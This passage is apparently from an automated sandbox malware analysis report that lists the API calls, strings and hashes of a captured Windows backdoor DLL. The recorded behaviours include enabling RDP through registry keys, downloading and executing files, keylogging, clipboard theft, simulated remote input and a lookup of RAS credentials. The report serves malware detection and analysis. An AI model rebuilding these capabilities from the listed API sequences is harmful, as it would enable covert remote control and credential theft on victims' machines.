Part of subcall function 10011F80: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10011FC7
Part of subcall function 10011F80: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,10009CF0,?,00000000,00000000,00000001), ref: 10011FDF
Part of subcall function 10011F80: GetLastError.KERNEL32(?,10009CF0,?,00000000,00000000,00000001), ref: 10011FE5
Part of subcall function 10011F80: CloseHandle.KERNEL32(?,?,10009CF0,?,00000000,00000000,00000001), ref: 10011FF6

Strings

Start, xrefs: 1000B186
Hotkey, xrefs: 1000B203
PortNumber, xrefs: 1000B1B5, 1000B1D1, 1000B1EA
SOFTWARE\Microsoft\Windows\CurrentVersion\netcache, xrefs: 1000B102
ShutdownWithoutLogon, xrefs: 1000B12C
SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp, xrefs: 1000B1D6
EnableAdminTSRemote, xrefs: 1000B113
fDenyTSConnections, xrefs: 1000B19C, 1000B219
SYSTEM\CurrentControlSet\Services\TermDD, xrefs: 1000B175
.DEFAULT\Keyboard Layout\Toggle, xrefs: 1000B208
SeShutdownPrivilege, xrefs: 1000B265, 1000B27E
SYSTEM\CurrentControlSet\Control\Terminal Server, xrefs: 1000B156, 1000B1A1, 1000B21E
SYSTEM\CurrentControlSet\Services\TermService, xrefs: 1000B18B
SOFTWARE\Policies\Microsoft\Windows\Installer, xrefs: 1000B118
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, xrefs: 1000B131
tratS, xrefs: 1000B16A
SYSTEM\CurrentControlSet\Control\Terminal Server\RDPTcp, xrefs: 1000B1BA
Enabled, xrefs: 1000B0FD
SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp, xrefs: 1000B1EF
delbanEST, xrefs: 1000B14B

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CloseValue$CreateProcessToken_strrev$AdjustCurrentErrorExitHandleLastLookupOpenPrivilegePrivilegesVersionWindowslstrlen
String ID: .DEFAULT\Keyboard Layout\Toggle$EnableAdminTSRemote$Enabled$Hotkey$PortNumber$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon$SOFTWARE\Microsoft\Windows\CurrentVersion\netcache$SOFTWARE\Policies\Microsoft\Windows\Installer$SYSTEM\CurrentControlSet\Control\Terminal Server$SYSTEM\CurrentControlSet\Control\Terminal Server\RDPTcp$SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp$SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp$SYSTEM\CurrentControlSet\Services\TermDD$SYSTEM\CurrentControlSet\Services\TermService$SeShutdownPrivilege$ShutdownWithoutLogon$Start$delbanEST$fDenyTSConnections$tratS
API String ID: 3375006655-3505973513
Opcode ID: b6b36289de5a6afeaa3dcec66aeabf9fe826455a63fa939151772377f311329d
Instruction ID: dc20f7a170daff86b313850e6ec23c72e1b0ea6aef47688a3a0a21085afcf0ea
Opcode Fuzzy Hash: b6b36289de5a6afeaa3dcec66aeabf9fe826455a63fa939151772377f311329d
Instruction Fuzzy Hash: AA31A174940F28B5F120E6A04C4FFEB6648CB50788F10C418FBD878287FB697261816F

Function 1000B6F0 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 137filesleepnetworkCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 1000B6FF
GetTickCount.KERNEL32 ref: 1000B753
wsprintfA.USER32 ref: 1000B768
URLDownloadToFileA.URLMON(00000000,?,C:\,00000000,00000000), ref: 1000B780
GetTempPathA.KERNEL32(00000104,?,00000000,?,C:\,00000000,00000000), ref: 1000B794
fopen.MSVCRT ref: 1000B7A4
fscanf.MSVCRT ref: 1000B7CB
GetTickCount.KERNEL32 ref: 1000B7D9
wsprintfA.USER32 ref: 1000B7F1
GetTickCount.KERNEL32 ref: 1000B7F6
wsprintfA.USER32 ref: 1000B80E
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 1000B829
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 1000B843
fscanf.MSVCRT ref: 1000B857
fclose.MSVCRT ref: 1000B866
DeleteFileA.KERNEL32(C:\), ref: 1000B874
Sleep.KERNEL32(?), ref: 1000B8BA

Strings

open, xrefs: 1000B83C
C:\, xrefs: 1000B778, 1000B79F, 1000B86F
%s?abc=%d, xrefs: 1000B762, 1000B808
%s%d.exe, xrefs: 1000B7EB
%s, xrefs: 1000B7C5, 1000B851

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CountFileTickwsprintf$DownloadSleepfscanf$DeleteExecutePathShellTempfclosefopen
String ID: %s$%s%d.exe$%s?abc=%d$C:\$open
API String ID: 2342319182-3740277425
Opcode ID: efc8b2f9a9451763ca32a080153ffa4e9b1549faa23eaf1f7e5fb8289fbcb6d9
Instruction ID: 0df0333b831ebe22e1ced74288834e4a7ee40290f568383da85469ab5f36e64c
Opcode Fuzzy Hash: efc8b2f9a9451763ca32a080153ffa4e9b1549faa23eaf1f7e5fb8289fbcb6d9
Instruction Fuzzy Hash: E6410471108391ABF324DB60CC89FEB379DEB84701F008918FB8996180DFB5AA08C766

Function 10007070 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 72COMMON

Download Yara Rule

APIs

LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 100070B0

Strings

., xrefs: 10007109
3, xrefs: 100070FF
i, xrefs: 100070FA
p, xrefs: 100070F5
2, xrefs: 10007104
v, xrefs: 100070EC
L$_RasDefaultCredentials#0, xrefs: 100070D9
ConvertSidToStringSidA, xrefs: 1000712E

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: AccountLookupName
String ID: .$2$3$ConvertSidToStringSidA$L$_RasDefaultCredentials#0$i$p$v
API String ID: 1484870144-2807325862
Opcode ID: 8034a4ce6335c7b49751b7c807799d4bf0c4f4392b1383a7d8b7beda29235542
Instruction ID: e483fb9418fd38a6f4b972ea0e4669484a3c348eff1775e07851af791e1d4d35
Opcode Fuzzy Hash: 8034a4ce6335c7b49751b7c807799d4bf0c4f4392b1383a7d8b7beda29235542
Instruction Fuzzy Hash: 7A21307150C382AFE301CB64D884B9BBBE4ABA5744F44894CF4D846252E2B8D64DC7A3

Function 10008B50 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,?,?), ref: 10008B8A
wsprintfA.USER32 ref: 10008BC3
FindFirstFileA.KERNEL32(?,?,?,?,?,?), ref: 10008BD5
wsprintfA.USER32 ref: 10008C14
wsprintfA.USER32 ref: 10008C37
??2@YAPAXI@Z.MSVCRT(00000018,?,00000001,?,?,?,?,?,?,?,?,?), ref: 10008CAD
??3@YAXPAX@Z.MSVCRT(0000005C), ref: 10008D16
FindNextFileA.KERNEL32(?,?), ref: 10008D45
FindClose.KERNEL32(?), ref: 10008D58

Strings

%s%s%s, xrefs: 10008C05
%s%s*.*, xrefs: 10008BBD
., xrefs: 10008BEE

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Findwsprintf$File$??2@??3@CloseFirstNextlstrlen
String ID: %s%s%s$%s%s*.*$.
API String ID: 862180513-1343461528
Opcode ID: e14b18b942a39200a656cf70c3732ae3f0ccc213fc944e3a0910edc23c46a763
Instruction ID: 519f5399ce91295c37a26932b4474774ed52c623669e24a96c359b1586835bbf
Opcode Fuzzy Hash: e14b18b942a39200a656cf70c3732ae3f0ccc213fc944e3a0910edc23c46a763
Instruction Fuzzy Hash: E851D1B14083809FE724CF28C884A9BBBE5FBC8750F404A1DE5D957291DB75EA09CB56

Function 10009A00 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 156keyboardsleepstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0000000A), ref: 10009A66
lstrlen.KERNEL32(?), ref: 10009A71
GetKeyState.USER32(00000010), ref: 10009ABB
GetAsyncKeyState.USER32(0000000D), ref: 10009AC7
GetKeyState.USER32(00000014), ref: 10009AD4
GetKeyState.USER32(00000014), ref: 10009AFC

Strings

<Enter>, xrefs: 10009B9D
<BackSpace>, xrefs: 10009B68

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: State$AsyncSleeplstrlen
String ID: <BackSpace>$<Enter>
API String ID: 43598291-3792472884
Opcode ID: 4cb686313a3aaed75b557f55e3074a30152c4a23e458e5b372660717e72530fa
Instruction ID: 6c961daac165878122585f88262e92b73c779f3799918725d04435c3580de12f
Opcode Fuzzy Hash: 4cb686313a3aaed75b557f55e3074a30152c4a23e458e5b372660717e72530fa
Instruction Fuzzy Hash: 5D5165325083869BFB10DF64ED947AF73E9EB86390F000D28E99183094EB75D849C393

Function 100086F0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 71fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 10008717
FindFirstFileA.KERNEL32(?,?), ref: 10008729
wsprintfA.USER32 ref: 10008766
FindNextFileA.KERNEL32(00000000,?), ref: 1000879D
FindClose.KERNEL32(00000000), ref: 100087A8
RemoveDirectoryA.KERNEL32(?), ref: 100087AF

Strings

., xrefs: 10008745
%s\%s, xrefs: 10008757
%s\*.*, xrefs: 1000870F

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Find$Filewsprintf$CloseDirectoryFirstNextRemove
String ID: %s\%s$%s\*.*$.
API String ID: 2470771279-1471744235
Opcode ID: 48a094ecb4422aae30d04e3c8334305c3e5488b34c2e9b4639e197224751b74a
Instruction ID: 4997ef6c0a53b4edcb34f252ea04d2ab30cd8e24f1ff6c4f86697f3dae8976e3
Opcode Fuzzy Hash: 48a094ecb4422aae30d04e3c8334305c3e5488b34c2e9b4639e197224751b74a
Instruction Fuzzy Hash: D111A8711083955BF220DBA0DCC8EEB77ACFFC5351F054C19F69942144E7B9964887A6

Function 10008520 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155memoryfilestringCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00002800), ref: 10008542
wsprintfA.USER32 ref: 1000855F
FindFirstFileA.KERNEL32(?,?), ref: 10008575
LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 100085CB
lstrlen.KERNEL32(?), ref: 1000865A
FindNextFileA.KERNEL32(?,?), ref: 100086AD

Strings

h, xrefs: 1000858D
%s\*.*, xrefs: 10008559

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: AllocFileFindLocal$FirstNextlstrlenwsprintf
String ID: %s\*.*$h
API String ID: 1497773571-1052742963
Opcode ID: 49f82c9bf525e0a1cf95f818f3b63bf61a03bec1fa494d0cba9411899341019a
Instruction ID: 6dc3bffa24102d40f333cfea9b115bd59c6de41bc40a21ef2b6d5182f104caaf
Opcode Fuzzy Hash: 49f82c9bf525e0a1cf95f818f3b63bf61a03bec1fa494d0cba9411899341019a
Instruction Fuzzy Hash: 825178319083829BE720CF248C8468BBBE6FF95384F014618FDD497381D77A9A09CB95

Function 1000A6B0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 82registrystringsleepCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000000,Applications\iexplore.exe\shell\open\command,00000000,000F003F,?), ref: 1000A6FA
RegQueryValueA.ADVAPI32(?,00000000,?,00000104), ref: 1000A718
RegCloseKey.ADVAPI32(?), ref: 1000A723
Sleep.KERNEL32(00000001), ref: 1000A72B
lstrlen.KERNEL32(?), ref: 1000A736
strstr.MSVCRT ref: 1000A74A
lstrcpy.KERNEL32(00000000,?), ref: 1000A759
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1000A7AE

Strings

Applications\iexplore.exe\shell\open\command, xrefs: 1000A6F0
D, xrefs: 1000A773

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CloseCreateOpenProcessQuerySleepValuelstrcpylstrlenstrstr
String ID: Applications\iexplore.exe\shell\open\command$D
API String ID: 454182167-535818822
Opcode ID: d166301520a6c393a5c7806a275e1dfa34a3405b019410c6f3728d46fc736ab6
Instruction ID: 593cd418b48c47020334956aaadb0b49f021ee54466ec57afc295a09b57ba92d
Opcode Fuzzy Hash: d166301520a6c393a5c7806a275e1dfa34a3405b019410c6f3728d46fc736ab6
Instruction Fuzzy Hash: 36216071208351AFF710CB60CD49FAB77E9EB85741F00491CF689962D0DBF8A948CB62

Function 1000F840 Relevance: 13.7, APIs: 9, Instructions: 163keyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 10012980: GetCurrentThreadId.KERNEL32 ref: 10012992
Part of subcall function 10012980: GetThreadDesktop.USER32(00000000), ref: 10012999
Part of subcall function 10012980: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 100129C6
Part of subcall function 10012980: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 100129D1
Part of subcall function 10012980: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 100129FE
Part of subcall function 10012980: lstrcmpiA.KERNEL32(?,?), ref: 10012A0D
Part of subcall function 10012980: SetThreadDesktop.USER32(00000000), ref: 10012A18
Part of subcall function 10012980: CloseDesktop.USER32(00000000), ref: 10012A30
Part of subcall function 10012980: CloseDesktop.USER32(00000000), ref: 10012A33

SetCursorPos.USER32(?,?,?,?,?,?,1000F46F,?,?,00000000), ref: 1000F8A8
WindowFromPoint.USER32(?,?,?,?,?,?,1000F46F,?,?,00000000), ref: 1000F8B0
SetCapture.USER32(00000000,?,?,?,?,1000F46F,?,?,00000000), ref: 1000F8B7
MapVirtualKeyA.USER32(?,00000000), ref: 1000F8F6
keybd_event.USER32(?,00000000), ref: 1000F900
MapVirtualKeyA.USER32(?,00000000), ref: 1000F914
keybd_event.USER32(00000000,00000000), ref: 1000F91E
mouse_event.USER32(00000008,00000000,00000000,00000000,00000000), ref: 1000F9DA

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseInformationObjectUserVirtualkeybd_event$CaptureCurrentCursorFromInputOpenPointWindowlstrcmpimouse_event
String ID:
API String ID: 1258999209-0
Opcode ID: 87c0ee3fb5cb562617c32d53462f1005af72ce18ca8f8d0d23252e2f3ad037bd
Instruction ID: 813ed5156889d3fee33ae762c864079a57abd66bf6c8d8a424e07c18233b4e17
Opcode Fuzzy Hash: 87c0ee3fb5cb562617c32d53462f1005af72ce18ca8f8d0d23252e2f3ad037bd
Instruction Fuzzy Hash: F34191317C0365BAF230CA148C8BF6A76A5E744F81F30811AF745FEAC9C5E4B940A69D

Function 1000FA90 Relevance: 13.6, APIs: 9, Instructions: 57clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00000000), ref: 1000FA9A
GetClipboardData.USER32(00000001), ref: 1000FAA6
CloseClipboard.USER32 ref: 1000FAB6
GlobalSize.KERNEL32(00000000), ref: 1000FAC5
GlobalLock.KERNEL32(00000000), ref: 1000FACF
??2@YAPAXI@Z.MSVCRT(00000001), ref: 1000FAD8
GlobalUnlock.KERNEL32(?), ref: 1000FAFF
CloseClipboard.USER32 ref: 1000FB05
??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000001), ref: 1000FB17

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$Close$??2@??3@DataLockOpenSizeUnlock
String ID:
API String ID: 3218637236-0
Opcode ID: 301b849cb216ea75fb687118c830899b240c7ce3f9174140f969f020cf22927b
Instruction ID: 8bd8b15d585b0a66e5e0549ea23a2daac3cce8b349df5dd2cf32f6ef4495ba93
Opcode Fuzzy Hash: 301b849cb216ea75fb687118c830899b240c7ce3f9174140f969f020cf22927b
Instruction Fuzzy Hash: 410122356043646FE700EF349C89AAB379AFF45741F404528FD0686200EBB5AC08C6B2

Function 1000FA20 Relevance: 12.0, APIs: 8, Instructions: 38clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00000000), ref: 1000FA22
EmptyClipboard.USER32 ref: 1000FA2E
GlobalAlloc.KERNEL32(00002000,?,?,?,?,?), ref: 1000FA3E
GlobalLock.KERNEL32(00000000), ref: 1000FA4C
GlobalUnlock.KERNEL32(00000000), ref: 1000FA69
SetClipboardData.USER32(00000001,00000000), ref: 1000FA72
GlobalFree.KERNEL32(00000000), ref: 1000FA79
CloseClipboard.USER32 ref: 1000FA80

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: ClipboardGlobal$AllocCloseDataEmptyFreeLockOpenUnlock
String ID:
API String ID: 453615576-0
Opcode ID: beee4563180182b3370716e68273ada2ef01d43424950d4e564b3c7d5d6ba5bf
Instruction ID: 6a4c86568739cfa889f9428084719cbd4829a3f5d72f13fa7c8734bacd2a58ba
Opcode Fuzzy Hash: beee4563180182b3370716e68273ada2ef01d43424950d4e564b3c7d5d6ba5bf
Instruction Fuzzy Hash: 5EF01D722003A19BF704AB708CCCA6B3A9AFB59792F040428FA46D6251CFA48C06D761

Function 10011F80 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F90
OpenProcessToken.ADVAPI32(00000000,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F97
LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10011FC7
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,10009CF0,?,00000000,00000000,00000001), ref: 10011FDF
GetLastError.KERNEL32(?,10009CF0,?,00000000,00000000,00000001), ref: 10011FE5
CloseHandle.KERNEL32(?,?,10009CF0,?,00000000,00000000,00000001), ref: 10011FF6

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3398352648-0
Opcode ID: d51332a10edc9ed0de53dc67db3489fbf75492b4b1e06feea115e57508ad5e88
Instruction ID: cc3510a64544969e40c7ba664627dc8a20d979994d2bd73b5cc00ac410b68b64
Opcode Fuzzy Hash: d51332a10edc9ed0de53dc67db3489fbf75492b4b1e06feea115e57508ad5e88
Instruction Fuzzy Hash: D401B171604361ABF704DB64CC8AF9B77A9FF88B00F41892CF9858A190D7F4EC449BA1

Function 10008F00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000021,?,00000021,00000000,00000001), ref: 10008F3F
FindClose.KERNEL32(00000000), ref: 10008FB9
CreateFileA.KERNEL32(00000021,40000000,00000002,00000000,00000002,00000080,00000000), ref: 10008FD1
CloseHandle.KERNEL32(00000000), ref: 10008FFB

Strings

p, xrefs: 10008F4E

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CloseFileFind$CreateFirstHandle
String ID: p
API String ID: 3283578348-2181537457
Opcode ID: 2c8b732b24ebe096cefe3b9dd28e29c66e00d67b571492c13087e5889d7322dd
Instruction ID: a9351d47ce1d038b449e59aee4ebb529ff1c7d311b8e8fe0981f574282c16cb6
Opcode Fuzzy Hash: 2c8b732b24ebe096cefe3b9dd28e29c66e00d67b571492c13087e5889d7322dd
Instruction Fuzzy Hash: E931B5719083139BE324DF28CC4576AB6AAFBC43E0F15853EF8999B3D4C6748A448792

